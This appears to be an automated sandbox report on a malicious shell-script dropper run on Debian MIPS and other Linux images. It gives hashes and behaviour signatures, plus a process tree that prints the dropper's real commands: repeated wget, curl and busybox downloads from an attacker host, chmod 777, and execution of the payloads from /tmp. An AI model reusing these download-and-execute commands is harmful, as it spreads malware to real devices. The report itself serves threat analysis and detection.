Analysis
-
max time kernel
150s -
max time network
127s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
24/11/2024, 01:00
Static task
static1
Behavioral task
behavioral1
Sample
ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh
-
Size
10KB
-
MD5
03977dc333adcf1bd239088130c5146a
-
SHA1
786dda0f9a258257c3c8c8c196b0c80525e5c921
-
SHA256
ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613
-
SHA512
6ecac3ce1d920fd81213a199987a4a9a636a164c9bbf7c86cba42a80c7d290b356c0afcf43ffaab877a673204b166c43ca7a878f6ee263c34bdec145196d5066
-
SSDEEP
192:9C6r48xt6ApTzGrokonqyTCaxYxKC6r48oiTzGSkonqyr:/t6ApTzGrwCxiTzG0
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 24 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 852 chmod 859 chmod 929 chmod 950 chmod 957 chmod 739 chmod 838 chmod 845 chmod 866 chmod 922 chmod 936 chmod 964 chmod 971 chmod 978 chmod 746 chmod 761 chmod 880 chmod 894 chmod 908 chmod 915 chmod 943 chmod 873 chmod 887 chmod 901 chmod -
Executes dropped EXE 24 IoCs
ioc pid Process /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 740 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA 747 MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD 762 eAUtElRrXgU3F4owPENkmI2x53Y08heRUD /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m 839 YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt 846 zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT 853 WbPyBOByRmIjujsGoHNEThpAKTMlChnflT /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To 860 Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 867 aihC944K8Q0TvCpjxSMtRX5smAOk3is675 /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 874 clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW 881 pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr 888 mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK 895 KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H 902 f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs 909 M7iIC286PgDvtysfenfNbI0dcR21w98Bqs /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H 916 f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs 923 M7iIC286PgDvtysfenfNbI0dcR21w98Bqs /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK 930 KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD 937 eAUtElRrXgU3F4owPENkmI2x53Y08heRUD /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m 944 YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 951 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA 958 MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To 965 Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 972 aihC944K8Q0TvCpjxSMtRX5smAOk3is675 /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt 979 zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 879 busybox 905 curl 932 wget 949 busybox 981 wget 856 curl 863 curl 886 busybox 893 busybox 745 busybox 918 wget 928 busybox 946 wget 960 wget 717 wget 862 wget 900 busybox 967 wget 970 busybox 802 curl 844 busybox 849 curl 855 wget 914 busybox 858 busybox 897 wget 912 curl 953 wget 904 wget 907 busybox 956 busybox 977 busybox 884 curl 841 wget 963 busybox 974 wget 940 curl 730 curl 742 wget 890 wget 926 curl 933 curl 935 busybox 939 wget 961 curl 750 curl 848 wget 877 curl 883 wget 919 curl 898 curl 975 curl 752 busybox 767 wget 833 busybox 876 wget 891 curl 968 curl 743 curl 842 curl 921 busybox 925 wget 954 curl 737 busybox -
Writes file to tmp directory 24 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT curl File opened for modification /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr curl File opened for modification /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H curl File opened for modification /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD curl File opened for modification /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m curl File opened for modification /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt curl File opened for modification /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 curl File opened for modification /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 curl File opened for modification /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW curl File opened for modification /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs curl File opened for modification /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs curl File opened for modification /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA curl File opened for modification /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 curl File opened for modification /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA curl File opened for modification /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD curl File opened for modification /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 curl File opened for modification /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To curl File opened for modification /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK curl File opened for modification /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m curl File opened for modification /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt curl File opened for modification /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To curl File opened for modification /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 curl File opened for modification /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK curl File opened for modification /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H curl
Processes
-
/tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh/tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh1⤵PID:708
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- System Network Configuration Discovery
PID:717
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- System Network Configuration Discovery
PID:737
-
-
/bin/chmodchmod 777 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1./7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵PID:741
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- System Network Configuration Discovery
PID:742
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- System Network Configuration Discovery
PID:745
-
-
/bin/chmodchmod 777 MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA./MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵PID:748
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵PID:749
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- System Network Configuration Discovery
PID:752
-
-
/bin/chmodchmod 777 eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD./eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- Executes dropped EXE
PID:762
-
-
/bin/rmrm eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵PID:765
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- System Network Configuration Discovery
PID:767
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- System Network Configuration Discovery
PID:833
-
-
/bin/chmodchmod 777 YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m./YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵PID:840
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- System Network Configuration Discovery
PID:841
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- System Network Configuration Discovery
PID:844
-
-
/bin/chmodchmod 777 zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt./zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵PID:847
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- System Network Configuration Discovery
PID:848
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵PID:851
-
-
/bin/chmodchmod 777 WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT./WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵PID:854
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- System Network Configuration Discovery
PID:855
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To./Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵PID:865
-
-
/bin/chmodchmod 777 aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675./aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵PID:868
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵PID:869
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵PID:872
-
-
/bin/chmodchmod 777 clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0./clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/chmodchmod 777 pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW./pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- System Network Configuration Discovery
PID:886
-
-
/bin/chmodchmod 777 mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr./mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- System Network Configuration Discovery
PID:890
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- System Network Configuration Discovery
PID:893
-
-
/bin/chmodchmod 777 KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK./KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵PID:896
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- System Network Configuration Discovery
PID:897
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- System Network Configuration Discovery
PID:900
-
-
/bin/chmodchmod 777 f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H./f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵PID:903
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- System Network Configuration Discovery
PID:904
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- System Network Configuration Discovery
PID:907
-
-
/bin/chmodchmod 777 M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs./M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H./f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- System Network Configuration Discovery
PID:921
-
-
/bin/chmodchmod 777 M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs./M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- System Network Configuration Discovery
PID:925
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- System Network Configuration Discovery
PID:928
-
-
/bin/chmodchmod 777 KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK./KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- System Network Configuration Discovery
PID:935
-
-
/bin/chmodchmod 777 eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD./eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- System Network Configuration Discovery
PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵PID:942
-
-
/bin/chmodchmod 777 YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m./YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- System Network Configuration Discovery
PID:949
-
-
/bin/chmodchmod 777 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1./7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵PID:952
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- System Network Configuration Discovery
PID:953
-
-
